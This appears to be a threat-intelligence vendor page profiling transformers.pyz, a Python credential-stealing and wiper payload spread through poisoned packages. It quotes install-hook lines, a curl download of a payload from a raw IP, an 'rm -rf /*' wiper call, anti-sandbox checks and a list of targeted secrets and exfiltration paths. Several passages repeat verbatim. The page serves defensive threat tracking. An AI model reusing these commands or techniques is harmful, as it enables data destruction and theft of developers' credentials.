Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
1 distinct threat actor attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
This payload is an evolution of the earlier transformers.pyz Python branch.
34 distinct techniques documented for this family, organized by ATT&CK tactic.
After obtaining credentials, it concurrently traverses 19 AWS regions... enumerates all Key Vaults across subscriptions... enumerates and automatically decrypts all secrets stored in GCP Secret Manager.
prepare: bun run tanstack_runner.js && exit 1 ... preinstall: bun run index.js ... downloading and executing rope.pyz / /tmp/managed.pyz .
The download command uses curl -k -L -s ... subprocess.run([ "rm" , "-rf" , "/*" ])
The transformers.pyz downloaded in stage one is a standalone Python package.
Missing the cryptography library? Automatically execute pip install cryptography --break-system-packages and silently install it.
After obtaining credentials, it concurrently traverses 19 AWS regions... enumerates all Key Vaults across subscriptions... enumerates and automatically decrypts all secrets stored in GCP Secret Manager.
After obtaining credentials, it concurrently traverses 19 AWS regions... enumerates all Key Vaults across subscriptions... enumerates and automatically decrypts all secrets stored in GCP Secret Manager.
the malware instead executes deploy_local() to install persistence mechanisms
Collected Data (JSON) → gzip compression → randomly generated AES-256 key + 12-byte random IV → AES-256-GCM encryption
Downloads https://83.142.209.194/transformers.pyz to /tmp/transformers.pyz
the remote-control program had a 1/6 probability of executing rm -rf /* , directly destroying the entire system.
After obtaining credentials, it concurrently traverses 19 AWS regions... enumerates all Key Vaults across subscriptions... enumerates and automatically decrypts all secrets stored in GCP Secret Manager.
Not running on Linux? Exit. System language is Russian ( LANG starts with ru )? Exit. CPU core count ≤ 2? Exit. This is a classic anti-sandbox technique
attempts to obtain temporary credentials from the EC2 instance metadata service ( 169.254.169.254 )
The local sample targets several credential classes: GitHub tokens... npm tokens... AWS credentials from environment variables, shared credential files... Kubernetes service account tokens... HashiCorp Vault tokens... Local developer secrets, including cloud configs, .npmrc , Git credentials, shell histories, private keys, Docker authentication data, and generic API keys found by regex.
If any of the following password managers are installed — 1Password, Bitwarden, pass , or gopass — the collector uses their CLI tools
Not running on Linux? Exit. System language is Russian ( LANG starts with ru )? Exit. CPU core count ≤ 2? Exit. This is a classic anti-sandbox technique
It also targets AI and developer tooling configuration files, including Cursor MCP configuration, VS Code MCP configuration, Claude Desktop configuration, Continue, Codeium, OpenCode, Kilo, and Zed settings.
If both previous layers fail... it creates a public GitHub repository and uploads the encrypted data as a file named results.json .
The payload contains a second GitHub path that creates a new public repository under a stolen GitHub token and uses it as a dead drop for exfiltrated results... After the repository is created, the malware commits JSON envelopes under a results/ path.
11 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
4 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
An earlier Python branch of the campaign's payload lineage, referenced as the predecessor to later durabletask-delivered Python malware with cloud and Kubernetes propagation capabilities.
An earlier malware payload in the same supply-chain campaign, described only as the predecessor/evolutionary basis for rope.pyz.
Earlier Python payload in the Shai-Hulud campaign family. It provided anti-analysis checks, credential collection, encrypted exfiltration, GitHub fallback, and geofenced destructive behavior, and served as the predecessor to rope.pyz.
A Python remote-control payload downloaded by the poisoned mistralai package. It steals cloud credentials, SSH keys, CI/CD tokens, password manager data, Kubernetes secrets, Vault secrets, and other sensitive files; encrypts and exfiltrates the data; establishes persistence via systemd; and includes geo-fenced destructive wiper behavior that can execute rm -rf /* on systems associated with Israel or Iran.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.